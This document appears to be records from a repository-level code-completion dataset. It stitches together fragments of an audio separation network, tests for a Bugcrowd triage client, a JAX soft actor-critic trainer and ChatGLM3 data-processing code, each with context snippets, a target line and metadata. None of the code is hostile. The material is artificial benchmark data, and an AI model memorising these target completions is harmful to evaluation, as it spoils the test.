class Net(nn.Module):
def __init__(self, label_len, L=8,
model_dim=512, num_enc_layers=10,
dec_buf_len=100, num_dec_layers=2,
dec_chunk_size=72, out_buf_len=2,
use_pos_enc=True, conditioning="mult", lookahead=True,
pretrained_path=None):
super(Net, self).__init__()
self.L = L
self.out_buf_len = out_buf_len
self.model_dim = model_dim
self.lookahead = lookahead
# Input conv to convert input audio to a latent representation
kernel_size = 3 * L if lookahead else L
self.in_conv = nn.Sequential(
nn.Conv1d(in_channels=2,
out_channels=model_dim, kernel_size=kernel_size, stride=L,
padding=0, bias=False),
nn.ReLU())
# Label embedding layer
self.label_embedding = nn.Sequential(
nn.Linear(label_len, 512),
nn.LayerNorm(512),
nn.ReLU(),
nn.Linear(512, model_dim),
nn.LayerNorm(model_dim),
nn.ReLU())
# Mask generator
self.mask_gen = MaskNet(
model_dim=model_dim, num_enc_layers=num_enc_layers,
dec_buf_len=dec_buf_len,
dec_chunk_size=dec_chunk_size, num_dec_layers=num_dec_layers,
use_pos_enc=use_pos_enc, conditioning=conditioning)
# Output conv layer
self.out_conv = nn.Sequential(
nn.ConvTranspose1d(
in_channels=model_dim, out_channels=2,
kernel_size=(out_buf_len + 1) * L,
stride=L,
padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt): | delta_itds.append(itd_diff(o.cpu(), g.cpu(), sr=44100)) | 2 | 2023-10-30 05:36:07+00:00 | 4k |
openai/bugbounty-gpt | tests/test_comment_handling.py | [
{
"identifier": "BugCrowdSubmission",
"path": "bugbounty_gpt/handlers/submission_handler.py",
"snippet": "class BugCrowdSubmission:\n def __init__(self, submission_id, classification, reasoning):\n \"\"\"\n Initializes a BugCrowdSubmission object.\n\n :param submission_id: ID of the submission.\n :param classification: Classification information for the submission.\n :param reasoning: Reasoning information for the submission.\n \"\"\"\n self.submission_id = submission_id\n self.classification = classification\n self.reasoning = reasoning\n\n def _prepare_assign_data(self, user_id):\n \"\"\"\n Prepares data to assign a user to the submission.\n\n :param user_id: ID of the user to be assigned.\n :return: Dictionary containing the required data.\n \"\"\"\n return {\n 'data': {\n 'type': 'submission',\n 'relationships': {\n 'assignee': {\n 'data': {\n 'id': user_id,\n 'type': 'identity'\n }\n }\n }\n }\n }\n\n def _handle_assign_response(self, response, user_id):\n \"\"\"\n Handles the response after assigning a user to the submission.\n\n :param response: Response object from the assignment operation.\n :param user_id: ID of the user assigned.\n \"\"\"\n if response.status_code == 200:\n logger.info(f\"Submission {self.submission_id} assigned to user {user_id}.\")\n else:\n logger.error(f\"Unable to assign submission {self.submission_id} to user {user_id}. Status code: {response.status_code}\")\n\n async def assign_to_user(self, user_id):\n \"\"\"\n Assigns a user to the submission.\n\n :param user_id: ID of the user to be assigned.\n \"\"\"\n data = self._prepare_assign_data(user_id)\n response = await BugCrowdAPI.patch_submission(self.submission_id, data)\n self._handle_assign_response(response, user_id)\n\n async def is_submission_new(self):\n \"\"\"\n Checks if the submission is new.\n\n :return: True if the submission is new, False otherwise.\n \"\"\"\n submission_data = await BugCrowdAPI.fetch_submission(self.submission_id)\n submission_state = submission_data['data']['attributes']['state']\n return submission_state.lower() == 'new'\n\n async def close_submission(self):\n \"\"\"\n Closes the submission on BugCrowd.\n \"\"\"\n logger.info(f\"Closing submission {self.submission_id} on BugCrowd.\")\n data = {\n 'data': {\n 'type': 'submission',\n 'attributes': {\n 'state': 'not_applicable'\n }\n }\n }\n response = await BugCrowdAPI.patch_submission(self.submission_id, data)\n if response.status_code != 200:\n raise Exception(f\"Failed to close submission {self.submission_id}. Status code: {response.status_code}, Content: {response.content}\")\n\n def _prepare_comment_data(self, comment_body, visibility_scope='everyone'):\n \"\"\"\n Prepares data to create a comment.\n\n :param comment_body: Text of the comment.\n :param visibility_scope: Visibility scope of the comment. Default is 'everyone'.\n :return: Dictionary containing the required data.\n \"\"\"\n return {\n \"data\": {\n \"type\": \"comment\",\n \"attributes\": {\n \"body\": comment_body,\n \"visibility_scope\": visibility_scope\n },\n \"relationships\": {\n \"submission\": {\n \"data\": {\n \"id\": self.submission_id,\n \"type\": \"submission\"\n }\n }\n }\n }\n }\n\n def _handle_comment_response_error(self, response):\n \"\"\"\n Handles the error response for a comment creation request.\n\n :param response: Response object from the comment creation operation.\n \"\"\"\n try:\n error_message = response.json()[\"errors\"][0][\"detail\"]\n except (json.JSONDecodeError, KeyError, IndexError):\n error_message = \"An error occurred, but the response is not a valid JSON object.\"\n logger.error(\"Error: \" + error_message)\n\n async def create_comment(self, comment_body, visibility_scope='everyone'):\n \"\"\"\n Creates a comment for the submission on BugCrowd.\n\n :param comment_body: Text of the comment.\n :param visibility_scope: Visibility scope of the comment. Default is 'everyone'.\n \"\"\"\n logger.info(f\"Creating comment for submission {self.submission_id} on BugCrowd.\")\n comment_data = self._prepare_comment_data(comment_body, visibility_scope)\n response = await BugCrowdAPI.create_comment(comment_data)\n if response.status_code in [400, 404, 409]:\n self._handle_comment_response_error(response)\n elif response.status_code != 201:\n logger.error(\"An unexpected error occurred.\")\n\n def generate_comment_text(self):\n \"\"\"\n Generates the text for a comment based on the classification.\n\n :return: Generated comment text or None if the classification is not found.\n \"\"\"\n try:\n specific_classification_name = self.classification.name\n specific_classification_text = RESPONSES[specific_classification_name]\n comment_text = f\"Hello!\\n\\n{specific_classification_text}\"\n return comment_text\n except KeyError:\n logger.error(f\"Response for classification {self.classification.name} not found.\")\n return None"
},
{
"identifier": "BugCrowdAPI",
"path": "bugbounty_gpt/handlers/bugcrowd_api.py",
"snippet": "class BugCrowdAPI:\n @staticmethod\n def _get_headers(content_type='application/vnd.bugcrowd+json'):\n \"\"\"\n Returns common headers for Bugcrowd API requests.\n\n :param content_type: Content type for the Accept header. Default is 'application/vnd.bugcrowd+json'.\n :return: Dictionary containing the required headers.\n \"\"\"\n return {\n 'Accept': content_type,\n 'Authorization': f'Token {BUGCROWD_API_KEY}'\n }\n\n @staticmethod\n async def _fetch_page(url, params, page_limit, page_offset):\n \"\"\"\n Fetches a page of data from the specified URL with pagination.\n\n :param url: URL to fetch data from.\n :param params: Parameters to include in the request.\n :param page_limit: Limit of items per page.\n :param page_offset: Offset for pagination.\n :return: List of data fetched from the page or an empty list if there is an error.\n \"\"\"\n pagination_params = {\n 'page[limit]': page_limit,\n 'page[offset]': page_offset,\n }\n complete_params = {**params, **pagination_params}\n\n async with httpx.AsyncClient() as client:\n response = await client.get(url, headers=BugCrowdAPI._get_headers(), params=complete_params)\n try:\n data = response.json()\n except json.JSONDecodeError as e:\n logger.error(f\"Error: Unable to decode JSON. {e}\")\n return []\n\n return data['data'] if data['data'] else []\n\n @staticmethod\n async def fetch_submissions(params):\n \"\"\"\n Fetches all submissions from BugCrowd.\n\n :param params: Parameters to include in the request.\n :return: List of all submissions or None if no submissions found.\n \"\"\"\n logger.info(\"Fetching submissions from BugCrowd.\")\n url = f'{API_BASE_URL}/submissions'\n page_limit = 100\n page_offset = 0\n all_submissions = []\n delay = 2 # Delay in seconds\n\n while True:\n submissions = await BugCrowdAPI._fetch_page(url, params, page_limit, page_offset)\n if not submissions:\n break\n\n all_submissions.extend(submissions)\n page_offset += page_limit\n\n time.sleep(delay) # Add a delay between API calls\n\n return all_submissions if all_submissions else None\n\n @staticmethod\n async def fetch_submission(submission_id):\n \"\"\"\n Fetches a specific submission from BugCrowd.\n\n :param submission_id: ID of the submission to fetch.\n :return: Submission data as a dictionary or None if an error occurred.\n \"\"\"\n logger.info(f\"Fetching submission {submission_id} from BugCrowd.\")\n url = f'{API_BASE_URL}/submissions/{submission_id}'\n\n async with httpx.AsyncClient() as client:\n response = await client.get(url, headers=BugCrowdAPI._get_headers())\n if response.status_code == 200:\n return response.json()\n else:\n logger.error(f\"Failed to fetch submission {submission_id}. Status code: {response.status_code}\")\n return None\n\n @staticmethod\n async def create_comment(comment_data):\n \"\"\"\n Creates a comment using the provided data.\n\n :param comment_data: Data for the comment.\n :return: Response object from the comment creation operation.\n \"\"\"\n url = f'{API_BASE_URL}/comments'\n headers = BugCrowdAPI._get_headers('application/json')\n\n async with httpx.AsyncClient() as client:\n response = await client.post(url, headers=headers, json=comment_data)\n if response.status_code == 201:\n logger.info(\"Comment created successfully.\")\n else:\n logger.error(f\"Failed to create comment. Status code: {response.status_code}\")\n return response\n\n @staticmethod\n async def patch_submission(submission_id, data):\n \"\"\"\n Patches a specific submission on BugCrowd.\n\n :param submission_id: ID of the submission to patch.\n :param data: Data to be patched.\n :return: Response object from the patch operation or None if an error occurred.\n \"\"\"\n logger.info(f\"Patching submission {submission_id} on BugCrowd.\")\n url = f'{API_BASE_URL}/submissions/{submission_id}'\n headers = BugCrowdAPI._get_headers()\n headers['Content-Type'] = 'application/vnd.bugcrowd.v4+json'\n\n async with httpx.AsyncClient() as client:\n response = await client.patch(url, headers=headers, data=json.dumps(data))\n\n if response.status_code != 200:\n logger.error(f\"Failed to patch submission {submission_id}. Status code: {response.status_code}\")\n return None\n\n return response"
}
] | from bugbounty_gpt.handlers.submission_handler import BugCrowdSubmission
from bugbounty_gpt.handlers.bugcrowd_api import BugCrowdAPI
from unittest.mock import patch, AsyncMock
import logging
import pytest | 2,664 |
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
|
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
| with patch.object(BugCrowdAPI, 'create_comment', new_callable=AsyncMock) as mock_create_comment: | 1 | 2023-10-27 22:41:24+00:00 | 4k |
LeapLabTHU/FamO2O | jax_cql/JaxCQL/sac.py | [
{
"identifier": "next_rng",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def next_rng(*args, **kwargs):\n global jax_utils_rng\n return jax_utils_rng(*args, **kwargs)"
},
{
"identifier": "value_and_multi_grad",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def value_and_multi_grad(fun, n_outputs, argnums=0, has_aux=False):\n def select_output(index):\n def wrapped(*args, **kwargs):\n if has_aux:\n x, *aux = fun(*args, **kwargs)\n return (x[index], *aux)\n else:\n x = fun(*args, **kwargs)\n return x[index]\n return wrapped\n\n grad_fns = tuple(\n jax.value_and_grad(select_output(i), argnums=argnums, has_aux=has_aux)\n for i in range(n_outputs)\n )\n def multi_grad_fn(*args, **kwargs):\n grads = []\n values = []\n for grad_fn in grad_fns:\n (value, *aux), grad = grad_fn(*args, **kwargs)\n values.append(value)\n grads.append(grad)\n return (tuple(values), *aux), tuple(grads)\n return multi_grad_fn"
},
{
"identifier": "mse_loss",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def mse_loss(val, target):\n return jnp.mean(jnp.square(val - target))"
},
{
"identifier": "JaxRNG",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "class JaxRNG(object):\n \"\"\" A convenient stateful Jax RNG wrapper. Can be used to wrap RNG inside\n pure function.\n \"\"\"\n\n @classmethod\n def from_seed(cls, seed):\n return cls(jax.random.PRNGKey(seed))\n\n def __init__(self, rng):\n self.rng = rng\n\n def __call__(self, keys=None):\n if keys is None:\n self.rng, split_rng = jax.random.split(self.rng)\n return split_rng\n elif isinstance(keys, int):\n split_rngs = jax.random.split(self.rng, num=keys + 1)\n self.rng = split_rngs[0]\n return tuple(split_rngs[1:])\n else:\n split_rngs = jax.random.split(self.rng, num=len(keys) + 1)\n self.rng = split_rngs[0]\n return {key: val for key, val in zip(keys, split_rngs[1:])}"
},
{
"identifier": "wrap_function_with_rng",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def wrap_function_with_rng(rng):\n \"\"\" To be used as decorator, automatically bookkeep a RNG for the wrapped function. \"\"\"\n def wrap_function(function):\n def wrapped(*args, **kwargs):\n nonlocal rng\n rng, split_rng = jax.random.split(rng)\n return function(split_rng, *args, **kwargs)\n return wrapped\n return wrap_function"
},
{
"identifier": "collect_jax_metrics",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def collect_jax_metrics(metrics, names, prefix=None):\n collected = {}\n for name in names:\n if name in metrics:\n collected[name] = jnp.mean(metrics[name])\n if prefix is not None:\n collected = {\n '{}/{}'.format(prefix, key): value for key, value in collected.items()\n }\n return collected"
},
{
"identifier": "Scalar",
"path": "jax_cql/JaxCQL/model.py",
"snippet": "class Scalar(nn.Module):\n init_value: float\n\n def setup(self):\n self.value = self.param('value', lambda x: self.init_value)\n\n def __call__(self):\n return self.value"
},
{
"identifier": "update_target_network",
"path": "jax_cql/JaxCQL/model.py",
"snippet": "def update_target_network(main_params, target_params, tau):\n return jax.tree_util.tree_map(\n lambda x, y: tau * x + (1.0 - tau) * y,\n main_params, target_params\n )"
}
] | from collections import OrderedDict
from copy import deepcopy
from functools import partial
from ml_collections import ConfigDict
from flax.training.train_state import TrainState
from .jax_utils import (
next_rng, value_and_multi_grad, mse_loss, JaxRNG, wrap_function_with_rng,
collect_jax_metrics
)
from .model import Scalar, update_target_network
import numpy as np
import jax
import jax.numpy as jnp
import flax
import flax.linen as nn
import optax
import distrax | 2,529 | qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
|
class SAC(object):
@staticmethod
def get_default_config(updates=None):
config = ConfigDict()
config.discount = 0.99
config.alpha_multiplier = 1.0
config.use_automatic_entropy_tuning = True
config.backup_entropy = False
config.target_entropy = 0.0
config.policy_lr = 3e-4
config.qf_lr = 3e-4
config.optimizer_type = 'adam'
config.soft_target_update_rate = 5e-3
if updates is not None:
config.update(ConfigDict(updates).copy_and_resolve_references())
return config
def __init__(self, config, policy, qf):
self.config = self.get_default_config(config)
self.policy = policy
self.qf = qf
self.observation_dim = policy.observation_dim
self.action_dim = policy.action_dim
self._train_states = {}
optimizer_class = {
'adam': optax.adam,
'sgd': optax.sgd,
}[self.config.optimizer_type]
policy_params = self.policy.init(
next_rng(self.policy.rng_keys()),
jnp.zeros((10, self.observation_dim))
)
self._train_states['policy'] = TrainState.create(
params=policy_params,
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
qf1_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf1'] = TrainState.create(
params=qf1_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
| metrics = collect_jax_metrics( | 5 | 2023-10-25 11:53:25+00:00 | 4k |
ssbuild/chatglm3_finetuning | data_utils.py | [
{
"identifier": "DataStrategy",
"path": "data_processer.py",
"snippet": "class DataStrategy(Enum):\r\n truncation = 1\r\n siding = 2\r"
},
{
"identifier": "TokenIdsMaker",
"path": "data_processer.py",
"snippet": "class TokenIdsMaker:\r\n def __init__(self,tokenizer: ChatGLMTokenizer, config):\r\n self.tokenizer = tokenizer\r\n self.config = config\r\n self.bos_token_id = self.tokenizer.get_command(\"<bos>\")\r\n self.pad_token_id = self.tokenizer.get_command(\"<pad>\")\r\n self.eos_token_id = self.tokenizer.get_command(\"<eos>\")\r\n\r\n def build_single_message(self, role, metadata, message):\r\n assert role in [\"system\", \"user\", \"assistant\", \"observation\"], role\r\n role_tokens = [self.tokenizer.get_command(f\"<|{role}|>\")] + self.tokenizer.encode(f\"{metadata}\\n\")\r\n message_tokens = self.tokenizer.encode(message)\r\n tokens = role_tokens + message_tokens\r\n return tokens\r\n\r\n @classmethod\r\n def final(cls, input_ids: typing.List, labels, max_seq_length, tokenizer):\r\n input_ids = np.asarray(input_ids, dtype=np.int32)\r\n labels = np.asarray(labels, dtype=np.int32)\r\n seqlen = np.asarray(len(input_ids), dtype=np.int32)\r\n pad_len = max_seq_length - seqlen\r\n\r\n if pad_len:\r\n pad_val = tokenizer.pad_token_id\r\n input_ids = np.pad(input_ids, (0, pad_len), 'constant', constant_values=(pad_val, pad_val))\r\n labels = np.pad(labels, (0, pad_len), 'constant', constant_values=(-100, -100))\r\n\r\n d = {\r\n 'input_ids': input_ids,\r\n 'labels': labels,\r\n 'seqlen': seqlen,\r\n }\r\n return d\r\n\r\n\r\n def build_chat_input(self, query, history=None, role=\"user\"):\r\n if history is None:\r\n history = []\r\n input_ids = []\r\n for item in history:\r\n content = item[\"content\"]\r\n input_ids.extend(self.build_single_message(item[\"role\"], item.get(\"metadata\", \"\"), content))\r\n if query is not None:\r\n input_ids.extend(self.build_single_message(role, \"\", query))\r\n return self.tokenizer.encode(input_ids, is_split_into_words=True)\r\n\r\n def parse_history_from_answers(self, output, history):\r\n content = \"\"\r\n metadata = \"\"\r\n history = copy.deepcopy(history)\r\n\r\n responses = output.split(\"<|assistant|>\")\r\n for response in responses:\r\n #ensure 语料包含换行符 格式为{metadata}\\n{content}\r\n if len(responses) > 1:\r\n metadata, content = response.split(\"\\n\", maxsplit=1)\r\n else:\r\n metadata = \"\"\r\n content = response\r\n\r\n if not metadata.strip():\r\n content = content.strip()\r\n history.append({\"role\": \"assistant\", \"metadata\": metadata, \"content\": content})\r\n else:\r\n history.append({\"role\": \"assistant\", \"metadata\": metadata, \"content\": content})\r\n return metadata, content, history\r\n\r\n def trunction(self, tokenizer: ChatGLMTokenizer,config, examples, max_seq_length,sup=True):\r\n ds = []\r\n history = []\r\n for sid, (q_role,q,a) in enumerate(examples):\r\n if q_role == \"system\":\r\n prefix = {\r\n \"role\": \"system\",\r\n \"content\": q,\r\n }\r\n history += [prefix]\r\n continue\r\n if q_role == \"function\":\r\n q_role = \"observation\"\r\n\r\n if q_role != \"observation\":\r\n q_role = \"user\"\r\n history += [ {\r\n \"role\": q_role,\r\n \"content\": q,\r\n } ]\r\n a_ids = self.build_chat_input(query=None, history=history)\r\n metadata, content, history = self.parse_history_from_answers(a,history)\r\n b_ids = self.tokenizer.encode(self.tokenizer.encode(a),is_split_into_words=True)\r\n role_tokens = [ self.tokenizer.get_command(\"<|assistant|>\") ] + self.tokenizer.encode(f\"{metadata}\\n\")\r\n while len(a_ids) + len(b_ids) > max_seq_length - len(role_tokens) - 2:\r\n if len(b_ids) > len(a_ids):\r\n b_ids.pop(-1)\r\n else:\r\n a_ids.pop(0)\r\n assert len(b_ids) > 0\r\n b_ids += [ self.eos_token_id ]\r\n a_ids = a_ids + role_tokens\r\n input_ids = a_ids + b_ids\r\n labels = copy.deepcopy(input_ids) if not sup else [ -100 ] * len(a_ids) + copy.deepcopy(b_ids)\r\n input_ids = [self.bos_token_id] + input_ids\r\n labels = [self.bos_token_id] + labels if not sup else [ -100 ] + labels\r\n assert len(input_ids) <= max_seq_length\r\n ds.append(self.final(input_ids, labels, max_seq_length, tokenizer))\r\n\r\n return ds\r\n\r\n\r\n\r\n # def slidding(cls, tokenizer: ChatGLMTokenizer,config, messages,\r\n # max_seq_length,\r\n # sliding_size = None,\r\n # src_max_length=-1,\r\n # dst_max_length=-1,\r\n # sup=True):\r\n #\r\n #\r\n # if sliding_size is None or sliding_size < 0:\r\n # sliding_size = max_seq_length - 1\r\n #\r\n # assert sliding_size <= max_seq_length - 1\r\n #\r\n # ds = []\r\n #\r\n # for sid, (q, a) in enumerate(messages):\r\n # a_ids = tokenizer.encode(text=build_template(q,prefix=prefix, history=examples[:sid]), add_special_tokens=False)\r\n # b_ids = tokenizer.encode(text=a, add_special_tokens=False)\r\n # if src_max_length and src_max_length > 0:\r\n # a_ids = a_ids[:src_max_length]\r\n # if dst_max_length and 